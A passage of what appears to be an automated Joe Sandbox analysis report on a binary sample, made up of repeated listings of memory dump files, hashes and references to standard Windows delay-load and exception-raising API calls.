                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 08c3d4c2d983826d83d3a9698dc28556ca9c98781d39ed2207f7c8d05e8fb7ad
                                                                                                                                                                          • Instruction ID: e98762d73df7f69a3c010337e8f4d634bed7927c8d126f706f251e8e948a3224
                                                                                                                                                                          • Opcode Fuzzy Hash: 08c3d4c2d983826d83d3a9698dc28556ca9c98781d39ed2207f7c8d05e8fb7ad
                                                                                                                                                                          • Instruction Fuzzy Hash: 90B092A2258100AC214461452806D3711CEC085F1173080EBBC25D00D0E840E9080531
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: e84fdc29cfac34709b868cb3c31750a1a5c87f4af6b696089e043654a418c2a9
                                                                                                                                                                          • Instruction ID: f2f7da7f7df80c27ce8c12ec1dcef80f4fc1d7ca67d96d20a9132d271e2f33f5
                                                                                                                                                                          • Opcode Fuzzy Hash: e84fdc29cfac34709b868cb3c31750a1a5c87f4af6b696089e043654a418c2a9
                                                                                                                                                                          • Instruction Fuzzy Hash: 88B09292258240AC214462456806D3711CDC084F1173081EBB825D01D0A840E8480631
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: a5ee7cbbba31cd67ec0f4726d4784953e66d4233a9fd7aa93824ef19faffc341
                                                                                                                                                                          • Instruction ID: 8b008298efbecbdf5e6fb6d65446596d0ad19e8ee0ff3a808472cb1a8127c949
                                                                                                                                                                          • Opcode Fuzzy Hash: a5ee7cbbba31cd67ec0f4726d4784953e66d4233a9fd7aa93824ef19faffc341
                                                                                                                                                                          • Instruction Fuzzy Hash: EAB09292258100AC210462452946D3711CDD084F1173080EBB825D01D0A850E90D0531
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 026800ae22c274fd9aa9551e0ac8a3d4df34ffafef20d7ee44b926f9d9086c20
                                                                                                                                                                          • Instruction ID: 59668bc08e19e0f82aff382c872cf3bd892e585113897d32a5b28f3b3acdedd2
                                                                                                                                                                          • Opcode Fuzzy Hash: 026800ae22c274fd9aa9551e0ac8a3d4df34ffafef20d7ee44b926f9d9086c20
                                                                                                                                                                          • Instruction Fuzzy Hash: 0CB012D2269140EC310471852C07D3711CED4C4F11B3040FFFC26D00D0F840EC080531
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: f0b744ad912360a26c5dc38ab0b8faec330ff53634dea88062e10e6689225ad7
                                                                                                                                                                          • Instruction ID: df381304a58f776de0e4b9888d64f7d5dbd231c3922b4eb8779a06d7271c8b3c
                                                                                                                                                                          • Opcode Fuzzy Hash: f0b744ad912360a26c5dc38ab0b8faec330ff53634dea88062e10e6689225ad7
                                                                                                                                                                          • Instruction Fuzzy Hash: 07B012D2258101EC3104B1552C47D3711CDC0C5F1173080FFFC25D00D0F940EC080531
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: efe4fc70ebcdc337dd25cfd6d1c96a51eb9fc5c1dbdbd77f77327a01e1c1bbfe
                                                                                                                                                                          • Instruction ID: 136b796e7554afeb52d5091061158bae4b3b7ddba597c6488da3542c9b05bd5b
                                                                                                                                                                          • Opcode Fuzzy Hash: efe4fc70ebcdc337dd25cfd6d1c96a51eb9fc5c1dbdbd77f77327a01e1c1bbfe
                                                                                                                                                                          • Instruction Fuzzy Hash: 0BB092A2259240AC214462456806D3711CEC084F11B3041EBB825D00D0A840A8480631
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 302ea58ecb2134d6ee8370a6672909b8968d73968dbf1df5b064f8e64c2c36b0
                                                                                                                                                                          • Instruction ID: 630813c3e35c2fa49c961271412e838167c15065750c9c1b23de029b50067226
                                                                                                                                                                          • Opcode Fuzzy Hash: 302ea58ecb2134d6ee8370a6672909b8968d73968dbf1df5b064f8e64c2c36b0
                                                                                                                                                                          • Instruction Fuzzy Hash: 91B012D2259140EC310471452C07D3711CEC0C5F11B3080FFFC25D00D0F840EC080531
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 386b423d20173df942621d85ed1000be755b25432b250e467f2dcf1041835302
                                                                                                                                                                          • Instruction ID: b06fe8abe40fa00589fae16acbf84973c9e0b46c799b44bc0b6dcc03d051f179
                                                                                                                                                                          • Opcode Fuzzy Hash: 386b423d20173df942621d85ed1000be755b25432b250e467f2dcf1041835302
                                                                                                                                                                          • Instruction Fuzzy Hash: 91B092A2258100BC2285A1041802E3612C9C080F1573080EBB824D60D0E8408A050533
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 7ee22493f93f0a7366eea238c1a3637302f9c6b0e337d9de2c6d954ce2f91643
                                                                                                                                                                          • Instruction ID: a9dc128c9728392105377f4ff09ab2f256aa591e4b4467a1fa3cc8f3514001e2
                                                                                                                                                                          • Opcode Fuzzy Hash: 7ee22493f93f0a7366eea238c1a3637302f9c6b0e337d9de2c6d954ce2f91643
                                                                                                                                                                          • Instruction Fuzzy Hash: B2B012E225C100BC324561041D02E3712CDC0C0F11730C0EFF924EA0D0E840CD0E0533
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 4f9729b7215681d2ab708cd1ef9ed2177a210d857610c610b499670828012160
                                                                                                                                                                          • Instruction ID: fecd098798e3ee449e5b8953a6ce0ff1486c81f6212153bdc4f77cdc97226194
                                                                                                                                                                          • Opcode Fuzzy Hash: 4f9729b7215681d2ab708cd1ef9ed2177a210d857610c610b499670828012160
                                                                                                                                                                          • Instruction Fuzzy Hash: 82B012E225C100FC3245A1041C02E3712CDC0C0F11730C0EFFC24E60D0E840CD090533
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E580
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E580
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E580
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E51F
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E51F
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E51F
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E51F
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 5e0596f7a32d57e07174d85d16bef478896ca9205712ccce575939ae39ab1276
                                                                                                                                                                          • Instruction ID: c6fa38f285e9ef718735900049fbe64f6c8c7e56b66ba89dc506c9b7063d1ca8
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e0596f7a32d57e07174d85d16bef478896ca9205712ccce575939ae39ab1276
                                                                                                                                                                          • Instruction Fuzzy Hash: D3A011E22A8202FC300822822C03C3B228EC0C8B22B3088EFFC22C00C0B880A8080830
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 79353dd78779f8d209ae8ab6f83a815109cf31db4945fdcd760e0c1982ce073e
                                                                                                                                                                          • Instruction ID: 71a69a0215866ce8f7eaa27c732ec72d075e42beba64a69d7d921dd207f5028a
                                                                                                                                                                          • Opcode Fuzzy Hash: 79353dd78779f8d209ae8ab6f83a815109cf31db4945fdcd760e0c1982ce073e
                                                                                                                                                                          • Instruction Fuzzy Hash: E2A012E11581017C310511001C02C3712CDC0C0B1573040DFF830A50C06C4048050432
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: c9720c142a66c7048754c4ee880f583cc3e4fa7175ef165a45a1022eb27ce1a9
                                                                                                                                                                          • Instruction ID: dea4ec407ff40d87b2348f221076a4acfaa017f4a95798caa94e2f9e2ae1826a
                                                                                                                                                                          • Opcode Fuzzy Hash: c9720c142a66c7048754c4ee880f583cc3e4fa7175ef165a45a1022eb27ce1a9
                                                                                                                                                                          • Instruction Fuzzy Hash: 95A012E115C101BC310511001C02C3712CDC0C0B1173044DFF821950C0684048050432
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
